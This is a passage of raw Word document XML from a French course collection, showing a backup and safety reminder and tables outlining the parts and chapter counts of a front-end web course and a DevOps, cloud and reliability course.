                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>4 Go de RAM minimum, 20 Go d'espace disque libre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SÉCURITÉ ET SAUVEGARDE</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="100" w:line="316" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>Les commandes du cours 2 modifient des systèmes. Avant toute manipulation sur une machine personnelle, sauvegardez vos données et travaillez dans une machine virtuelle ou un conteneur jetable. Ne copiez jamais une commande de suppression ou de réinitialisation sans en comprendre l'effet.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="140" w:lineRule="exact"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:pageBreakBefore/>
      </w:pPr>
      <w:r>
        <w:t>Plan de la collection</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="40" w:after="200" w:line="372" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Le volume contient deux cours complets. Le tableau ci-dessous en donne la structure, le volume de chapitres et le niveau visé.</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1803"/>
        <w:gridCol w:w="1803"/>
        <w:gridCol w:w="1803"/>
        <w:gridCol w:w="1803"/>
        <w:gridCol w:w="1803"/>
      </w:tblGrid>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
          <w:tblHeader w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="91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Cours</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="418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Intitulé</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="100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Parties</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="118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Chapitres</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="173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Niveau</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="911"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:color w:val="0F2E4C"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Cours 1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4188"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Développement web front-end</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1002"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>7</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1184"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>45</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1730"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Débutant à intermédiaire</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="91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Cours 2</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="418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DevOps, cloud et fiabilité</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="100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7</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="118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48</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="173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Intermédiaire à confirmé</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="80" w:lineRule="exact"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>Développement web front-end</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>HTML5, CSS3 et JavaScript, du premier fichier HTML à la mise en production. Un parcours progressif : structure du document, mise en forme, mises en page modernes, interactivité, accessibilité, performance et déploiement.</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120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Partie</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="631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Intitulé</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="150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Chapitres</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1202"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:color w:val="0F2E4C"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Partie I</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="6310"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Les fondations du Web</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1502"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>8</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="120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Partie II</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="631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CSS : mise en forme et design</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="150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8</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1202"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:color w:val="0F2E4C"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Partie III</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="6310"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Mise en page moderne et accessibilité</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1502"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>7</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="120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Partie IV</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="631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JavaScript et interactivité</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="150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8</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1202"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:color w:val="0F2E4C"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Partie V</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="6310"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Qualité, performance et mise en production</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1502"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>5</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="120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Partie VI</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="631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Approfondissements</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="150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4</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1202"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:color w:val="0F2E4C"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Partie VII</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="6310"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Le Web comme plateforme</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1502"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>5</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="80" w:lineRule="exact"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>DevOps, cloud et fiabilité</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>De la culture DevOps à la production : Linux, réseaux, conteneurs, Kubernetes, cloud, infrastructure as code, CI/CD, GitOps, observabilité et ingénierie de fiabilité.</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120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Partie</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="631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Intitulé</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="150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Chapitres</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1202"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:color w:val="0F2E4C"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Partie I</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="6310"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Culture DevOps et systèmes</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1502"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>8</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="120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Partie II</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="631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Réseaux, protocoles et serveurs</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="150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8</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1202"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:color w:val="0F2E4C"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Partie III</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="6310"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Conteneurs et orchestration</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1502"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>7</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="120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Partie IV</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="631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Cloud, provisionnement et configuration</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="150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9</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1202"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:color w:val="0F2E4C"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Partie V</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="6310"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Livraison, sécurité et exploitation</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1502"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>7</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="120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Partie VI</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="631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Systèmes distribués et industrialisation</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="150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8</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1202"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
